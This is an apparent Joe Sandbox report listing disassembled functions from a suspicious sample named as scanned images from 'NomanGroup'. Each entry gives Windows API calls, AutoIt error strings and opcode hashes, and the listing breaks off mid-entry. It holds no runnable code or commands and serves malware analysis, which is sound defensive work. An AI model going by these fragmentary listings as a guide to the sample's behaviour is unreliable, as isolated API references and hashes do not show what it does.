                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: ec5aacf21a0f6074baddf930c5e1b58134d4d45143cfe13ee8edcc18a0b39552
                                                                                • Instruction ID: d3313de4d882794a934676aff02a704e5b68cddba1cb66e462acca064cdfb9b0
                                                                                • Opcode Fuzzy Hash: ec5aacf21a0f6074baddf930c5e1b58134d4d45143cfe13ee8edcc18a0b39552
                                                                                • Instruction Fuzzy Hash: 90318039A005049FD754DF68D884FAE7BA4EB45309F14806AE805CB352DB38EDC6CB99
                                                                                Function 004E3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMenu.USER32 ref: 004E3C79
                                                                                • SetMenu.USER32(?,00000000), ref: 004E3C88
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E3D10
                                                                                • IsMenu.USER32(?), ref: 004E3D24
                                                                                • CreatePopupMenu.USER32 ref: 004E3D2E
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E3D5B
                                                                                • DrawMenuBar.USER32 ref: 004E3D63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                • String ID: 0$F
                                                                                • API String ID: 161812096-3044882817
                                                                                • Opcode ID: ecd71fb760f4a10c5b86fec1030933cdebee2a534fbd8536302ec6025468258b
                                                                                • Instruction ID: 20aee4a145cbf209e24ae901734a79bdc4355f6d2e690ff5ca769fc9602f9cb4
                                                                                • Opcode Fuzzy Hash: ecd71fb760f4a10c5b86fec1030933cdebee2a534fbd8536302ec6025468258b
                                                                                • Instruction Fuzzy Hash: 6741AD75A01249EFDB10CF61D888EAA77B5FF49342F140029F9069B360D734AA11CF98
                                                                                Function 004E3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004E3A9D
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004E3AA0
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E3AC7
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004E3AEA
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004E3B62
                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 004E3BAC
                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004E3BC7
                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 004E3BE2
                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 004E3BF6
                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004E3C13
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 312131281-0
                                                                                • Opcode ID: c8f0240a3fed95b6214013b01bf928c0d33df1569287d60023ac1a8a74f904fa
                                                                                • Instruction ID: 11d65f599f0070db43d8a36c9bc8ac48f773c896673879c5d9af80157bf81a20
                                                                                • Opcode Fuzzy Hash: c8f0240a3fed95b6214013b01bf928c0d33df1569287d60023ac1a8a74f904fa
                                                                                • Instruction Fuzzy Hash: 0B618D71900248AFDB11DF68CC85EEE77B8EF09305F10019AFA05AB392C774AE46DB54
                                                                                Function 004BB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004BB151
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB165
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004BB16C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB17B
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004BB18D
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB1A6
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB1B8
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB1FD
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB212
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004BA1E1,?,00000001), ref: 004BB21D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: d770ed7df9c1265267c2ae7428cd225712bded05ab04afa40386d071c3750b3e
                                                                                • Instruction ID: d5505259c8310b6d95bc044be0f55c77be62519a011758c993679cd61fd77091
                                                                                • Opcode Fuzzy Hash: d770ed7df9c1265267c2ae7428cd225712bded05ab04afa40386d071c3750b3e
                                                                                • Instruction Fuzzy Hash: BB31A071640204AFDB249F64DC8CFAE7BA9FF61351F104056F910DA290E7B89D068FB8
                                                                                Function 00482C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00482C94
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 00482CA0
                                                                                • _free.LIBCMT ref: 00482CAB
                                                                                • _free.LIBCMT ref: 00482CB6
                                                                                • _free.LIBCMT ref: 00482CC1
                                                                                • _free.LIBCMT ref: 00482CCC
                                                                                • _free.LIBCMT ref: 00482CD7
                                                                                • _free.LIBCMT ref: 00482CE2
                                                                                • _free.LIBCMT ref: 00482CED
                                                                                • _free.LIBCMT ref: 00482CFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 66ce8ad1b57d23071cbdecb7d9476694c392d66be57e0b05894dbb46a276f898
                                                                                • Instruction ID: c1d5600d044cb9b7954ab3af04c9fe372c264ba17defc1d1302a5a5c4556f512
                                                                                • Opcode Fuzzy Hash: 66ce8ad1b57d23071cbdecb7d9476694c392d66be57e0b05894dbb46a276f898
                                                                                • Instruction Fuzzy Hash: 5011AAB5200108AFCB02FF55DA42CDD3BA5FF05354F42489AFA485F222D679EE509B54
                                                                                Function 00451410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00451459
                                                                                • OleUninitialize.OLE32(?,00000000), ref: 004514F8
                                                                                • UnregisterHotKey.USER32(?), ref: 004516DD
                                                                                • DestroyWindow.USER32(?), ref: 004924B9
                                                                                • FreeLibrary.KERNEL32(?), ref: 0049251E
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0049254B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: 06a07fcef0a2911bff99a699a5fd36924d1f67a52cdfb6f5d885fd4c071e59ec
                                                                                • Instruction ID: dcb96fcdc5d4231dd291d8f14bbe37df9fcb39f433a703cfe25e8be97957300e
                                                                                • Opcode Fuzzy Hash: 06a07fcef0a2911bff99a699a5fd36924d1f67a52cdfb6f5d885fd4c071e59ec
                                                                                • Instruction Fuzzy Hash: E9D1BD31701212EFCB19EF15C594B29FBA0BF05315F1541AFE84A6B262DB38AC1ACF59
                                                                                Function 00455BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00455C7A
                                                                                  • Part of subcall function 00455D0A: GetClientRect.USER32(?,?), ref: 00455D30
                                                                                  • Part of subcall function 00455D0A: GetWindowRect.USER32(?,?), ref: 00455D71
                                                                                  • Part of subcall function 00455D0A: ScreenToClient.USER32(?,?), ref: 00455D99
                                                                                • GetDC.USER32 ref: 004946F5
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00494708
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00494716
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0049472B
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00494733
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004947C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: 0aa7f80635d4093b1b1c428a48e9b9f94f17530474aca510d48541d2644755c4
                                                                                • Instruction ID: 1e794fbb8258a040b6357992d0defe41e783853b266b349037305896a80c771c
                                                                                • Opcode Fuzzy Hash: 0aa7f80635d4093b1b1c428a48e9b9f94f17530474aca510d48541d2644755c4
                                                                                • Instruction Fuzzy Hash: 9671CD35400209DFCF218FA4C984EBA7FB1EF86325F1442BAED515A266C3389846DF69
                                                                                Function 004C359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004C35E4
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • LoadStringW.USER32(00522390,?,00000FFF,?), ref: 004C360A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$_wcslen
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 4099089115-2391861430
                                                                                • Opcode ID: 57b4a3be20b0652bce242cb0d9f79e896a7c2c08d26260365f52361b65cd1fc6
                                                                                • Instruction ID: da4a5f22eb4e3a0c1198177e92ccce7a80d329000e20de390072fe740a93b301
                                                                                • Opcode Fuzzy Hash: 57b4a3be20b0652bce242cb0d9f79e896a7c2c08d26260365f52361b65cd1fc6
                                                                                • Instruction Fuzzy Hash: 29519471800109FADF15EFA1CC42EEEBB75EF14346F14412AF90572162DB381A99DF69
                                                                                Function 004CC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004CC272
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004CC29A
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004CC2CA
                                                                                • GetLastError.KERNEL32 ref: 004CC322
                                                                                • SetEvent.KERNEL32(?), ref: 004CC336
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004CC341
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 3113390036-3916222277
                                                                                • Opcode ID: 9fa272b984dad4c06fa10be388767f518c54506754da0e1aaaf8dd2db075795b
                                                                                • Instruction ID: 2bc55de7eb4834af09a330c46f6f78a7b827f63d2ac9fc4e5b93df95f7022c7a
                                                                                • Opcode Fuzzy Hash: 9fa272b984dad4c06fa10be388767f518c54506754da0e1aaaf8dd2db075795b
                                                                                • Instruction Fuzzy Hash: 3531D179900244AFD7619F659CC8FAB7BFCEB49344B04842FF84A96211DB38DC068B69
                                                                                Function 004B989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00493AAF,?,?,Bad directive syntax error,004ECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004B98BC
                                                                                • LoadStringW.USER32(00000000,?,00493AAF,?), ref: 004B98C3
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004B9987
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 858772685-4153970271
                                                                                • Opcode ID: a404ed75cb8918a70da54ada69b2f892ee30c8df2416b3ff5334c034e25531d2
                                                                                • Instruction ID: a66f8732232eeb1971fb712541c4f7185209048a76a824c4b60964d351a2c388
                                                                                • Opcode Fuzzy Hash: a404ed75cb8918a70da54ada69b2f892ee30c8df2416b3ff5334c034e25531d2
                                                                                • Instruction Fuzzy Hash: AC21B43180021EEBDF11AF90CC46EEE7735FF14705F04442BF915660A2EB79AA58CB25
                                                                                Function 004B209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32 ref: 004B20AB
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 004B20C0
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004B214D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1290815626-3381328864
                                                                                • Opcode ID: d2436a4f1bc6152d58c561dc4f73382bb580071009f443edf3ef42700b09c796
                                                                                • Instruction ID: 1a6aee7f4a1ecf2fdce8a6a3de93b11b8c0d329bed3b9cbcf56d3183cd3502d1
                                                                                • Opcode Fuzzy Hash: d2436a4f1bc6152d58c561dc4f73382bb580071009f443edf3ef42700b09c796
                                                                                • Instruction Fuzzy Hash: 4211E776688707B9F6012629DD06DE7379CDB44324B20402BFB05A51D2FAAD58425A2D
                                                                                Function 0048CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                • String ID:
                                                                                • API String ID: 1282221369-0
                                                                                • Opcode ID: 9a7749e2ae0439f2d52f8548e232d23c85d0c6521815cfb3ce334086ed3979a7
                                                                                • Instruction ID: b7a7be284203b891d92803ac352ea1cc42c9c039abf1726c59be48645d59ccc9
                                                                                • Opcode Fuzzy Hash: 9a7749e2ae0439f2d52f8548e232d23c85d0c6521815cfb3ce334086ed3979a7
                                                                                • Instruction Fuzzy Hash: 32614BB1A05200AFEF21BFB598C1A6E7B95EF02314F14496FFB04973C2D63D99029768
                                                                                Function 004E50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 004E5186
                                                                                • ShowWindow.USER32(?,00000000), ref: 004E51C7
                                                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 004E51CD
                                                                                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 004E51D1
                                                                                  • Part of subcall function 004E6FBA: DeleteObject.GDI32(00000000), ref: 004E6FE6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E520D
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004E521A
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004E524D
                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 004E5287
                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 004E5296
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                • String ID:
                                                                                • API String ID: 3210457359-0
                                                                                • Opcode ID: 80255ee22662401032ba54b8e576a41e81fd616000448164a68ddf63d8247aad
                                                                                • Instruction ID: d27ea52dfc40dff449b43b3492d21b205392a6c8c94324b2003b42a8915c000c
                                                                                • Opcode Fuzzy Hash: 80255ee22662401032ba54b8e576a41e81fd616000448164a68ddf63d8247aad
                                                                                • Instruction Fuzzy Hash: CF51D530E40A88BFEF209F26CC45BDA7B65FB0532AF144057F6149A2E1C3799981DF49
                                                                                Function 00468B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004A6890
                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004A68A9
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004A68B9
                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004A68D1
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004A68F2
                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00468874,00000000,00000000,00000000,000000FF,00000000), ref: 004A6901
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004A691E
                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00468874,00000000,00000000,00000000,000000FF,00000000), ref: 004A692D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
